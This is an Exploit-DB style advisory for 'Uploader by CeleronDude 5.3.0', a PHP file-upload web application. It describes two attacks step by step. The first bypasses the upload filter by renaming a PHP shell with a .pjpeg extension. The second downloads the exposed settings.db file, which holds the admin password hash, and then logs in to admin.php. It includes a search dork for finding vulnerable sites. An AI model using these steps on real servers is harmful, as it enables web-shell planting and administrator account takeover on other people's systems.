Uploader by CeleronDude 5.3.0 - Arbitrary File Upload (2)

EDB-ID:

11166

CVE:

N/A

Author:

Stink'

Type:

webapps

Platform:

PHP

Published:

2010-01-17

#############################
Uploader by CeleronDude 5.3.0 - Upload Vulnerability
Discovered by : Stink'
Date : 2009-12-17 for upload. 2010-01-17 for Settings.db retrieve password.

Dork : "Uploader by CeleronDude."
Website Publisher : <a href="http://www.celerondude.com/php-uploader-v5">http://www.celerondude.com/php-uploader-v5</a>
#############################

-- [Upload Vulnerability] --
Rename your shell.php in shell.php.pjpeg and Upload !

-- [Retrieve Password] --

Go to : http://site.com/[path]/data/settings.db

"admin_password";s:32:"468f7b0aaba9a806a0ce5bc4d4482164"

and go http://site.com/[path]/admin.php :)